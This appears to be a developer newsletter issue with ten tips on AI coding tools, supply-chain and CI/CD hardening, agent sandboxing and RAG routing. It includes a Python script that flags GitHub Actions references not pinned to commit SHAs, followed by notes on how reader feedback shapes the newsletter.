  1. Set package manager cooldown to 60 days today. pnpm: minimumReleaseAge: "60d" in .npmrc. npm 11.10+: min-release-age=60d. Yarn 4.10+: npmMinimalAgeGate: "60d". This single config change would have blocked both the LiteLLM and Shai-Hulud supply chain attacks.

  2. Install code-review-graph as a Claude Code plugin for 49x token savings. Run claude install code-review-graph, let it build the AST knowledge graph on your repo, and every subsequent code review uses the minimal context set. On large repos, this drops review costs from dollars to pennies.

  3. Use the two-agent harness pattern with a progress file for long-running Claude Code sessions. Create a claude-progress.txt in your project root. Have your init prompt enumerate features as a JSON array. Start each new session by reading the progress file. Update it at the end. Simple, effective, production-tested by Anthropic's own team.

  4. Run /context periodically during long Claude Code sessions to identify token-hungry tools. The command flags memory bloat, identifies which tools consume the most context, and suggests specific optimization steps. Better to prune proactively than to hit degraded output quality.

  5. Audit your CI/CD security scanners as attack surfaces, not just defense tools. After TeamPCP's Trivy compromise, treat every GitHub Action with CI/CD credentials as a potential lateral movement vector. Pin action versions to commit SHAs, not tags. Review what credentials each action can access.

  6. Map your agent deployments against OWASP's Top 10 for Agentic Applications. Print the ASI01-ASI10 list. For each agent you ship, check which risks apply. Most teams I've talked to cover 2-3 of the 10. The other 7 are open attack surfaces.

  7. Use ACON's failure-driven guideline optimization for agent context compression. The ICLR paper shows 26-54% token reduction with 95%+ accuracy preserved, and it works with closed-source models. Analyze where compressed context fails and update compression guidelines in natural language.

  8. Try Claude Code's /batch command for independent parallel changes. It handles worktree isolation automatically. No manual git worktree setup needed. Use it for competing debug hypotheses or simultaneous frontend/backend/test changes.

  9. Deploy Firecracker microVMs for untrusted agent code execution. ~125ms boot time, <5MiB memory overhead, dedicated kernel per workload. Default to microVMs for untrusted code. Only relax to gVisor or hardened containers when your threat model justifies it.

  10. Add intent-aware routing to your RAG pipeline. Classify queries as factual (route to fast model + vector retrieval), procedural (route to step-by-step reasoning), or open-ended (route to capable model + web search). This reduces costs by 60-80% on simple lookups while reserving expensive inference for complex reasoning.
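Skill #5's "pin action versions to commit SHAs, not tags" is the kind of rule that only holds if something checks it on every commit. The script below is an added example (mine, not a tool mentioned above) that scans workflow text for `uses:` references and flags anything not pinned to a 40-hex commit SHA, using only the standard library so it can sit in a pre-commit hook. The sample workflow is constructed and its action names are placeholders, not real actions.

```python
"""Flag GitHub Actions `uses:` references that are not pinned to a commit SHA."""
import re
import sys
from pathlib import Path

USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^'\"\s#]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def check_uses(ref):
    """Classify one `uses:` value. Returns None if acceptable, else a reason."""
    if ref.startswith(("./", "docker://")):
        return None                      # local action or image: not a registry ref
    if "@" not in ref:
        return "no version reference at all"
    _action, version = ref.rsplit("@", 1)
    if SHA_RE.match(version):
        return None                      # immutable: a SHA cannot be repointed
    if re.match(r"^v?\d", version):
        return "mutable tag; a tag can be moved to a new commit"
    return "branch reference; tracks whatever is committed next"


def scan_workflow_text(text, name="<workflow>"):
    """Return [(name, lineno, ref, reason)] for every unpinned action."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if m:
            reason = check_uses(m.group(1))
            if reason:
                findings.append((name, lineno, m.group(1), reason))
    return findings


def scan_paths(paths):
    findings = []
    for p in paths:
        findings.extend(scan_workflow_text(Path(p).read_text(encoding="utf-8"), str(p)))
    return findings


# Constructed workflow; the action names are placeholders.
SAMPLE = """\
name: ci
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: example-org/checkout-action@v4
      - uses: example-org/scanner-action@main
      - uses: example-org/lint-action@0123456789abcdef0123456789abcdef01234567 # v2.1.0
      - uses: ./.github/actions/local-step
      - uses: docker://example.invalid/image:1.0
"""

if __name__ == "__main__":
    # Usage: python check_pins.py [workflow.yml ...]; defaults to .github/workflows, else the sample.
    paths = sys.argv[1:] or [str(p) for p in Path(".github/workflows").glob("*.y*ml")]
    findings = scan_paths(paths) if paths else scan_workflow_text(SAMPLE, "SAMPLE")
    for name, lineno, ref, reason in findings:
        print(f"{name}:{lineno}: {ref}: {reason}")
    sys.exit(1 if findings else 0)
```

Pinning is necessary but not sufficient: a SHA stops an upstream tag from being silently repointed, which is the step a compromised scanner action relies on, but it does nothing about the credentials the pinned action can still read, so pair this check with the "review what credentials each action can access" half of the same skill.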


Like what you're reading? Have feedback? Reply directly to this email or find me on Bluesky @webdevdad. If this newsletter helped you catch something important or ship something better, I'd love to hear about it.


How This Newsletter Learns From You

This newsletter has been shaped by 10 pieces of feedback so far. Every reply you send adjusts what I research next.

Your current preferences (from your feedback):

  • More builder tools (weight: +2.5)
  • More agent security (weight: +2.0)
  • More agent security (weight: +1.5)
  • More vibe coding (weight: +1.5)
  • Less market news (weight: -1.0)
  • Less valuations and funding (weight: -3.0)
  • Less market news (weight: -3.0)

Want to change these? Just reply with what you want more or less of.

Ways to steer this newsletter:

  • "More [topic]" / "Less [topic]" — adjust coverage priorities
  • "Deep dive on [X]" — I'll dedicate extra research to it
  • "[Section] was great" — reinforces that direction
  • "Missed [event/topic]" — I'll add it to my radar
  • Rate sections: "Vibe Coding section: 9/10" helps me calibrate

Reply to this email — I've processed 8/10 replies so far and every one makes tomorrow's issue better.